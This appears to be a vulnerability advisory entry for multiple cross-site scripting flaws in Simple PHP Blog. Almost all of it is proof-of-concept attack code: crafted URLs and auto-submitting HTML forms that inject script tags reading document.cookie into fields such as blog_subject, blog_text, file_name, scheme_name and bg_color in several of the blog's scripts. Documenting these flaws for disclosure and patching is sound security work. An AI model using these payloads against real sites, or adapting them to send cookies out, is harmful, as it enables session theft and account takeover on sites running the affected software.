|
Simple PHP Blog Multiple Input Validation Vulnerabilities
No exploit is required. Example URI and HTML code have been provided: http://localhost/~enji/path-to-sphpblog/preview_static_cgi.php?entry=foo"><script>alert(document.cookie)</script> http://www.example.com/path-to-sphpblog/preview_cgi.php?entry=foo"><script>alert(document.cookie)</script> <form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post"> <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post"> <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post"> <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post"> <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post"> <input name="file_name" value='"><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post"> <input name="save_btn" value="1"/> <input name="scheme_name" value='"></option></select><script>alert(document.cookie)</script>'/> <input name="scheme_file" value="blabla"/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> <form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post"> <input name="save_btn" value="1"/> <input name="scheme_name" value="myscheme"/> <input name="scheme_file" value="blabla"/> <input name="bg_color" value='"><script>alert(document.cookie)</script>'/> <input type="submit"/> </form> <script type="text/javascript"> document.forms[0].submit(); </script> |
|
Privacy Statement |